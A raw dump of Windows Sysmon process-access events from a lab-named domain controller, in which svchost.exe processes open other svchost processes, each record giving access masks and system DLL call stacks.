13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.696{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 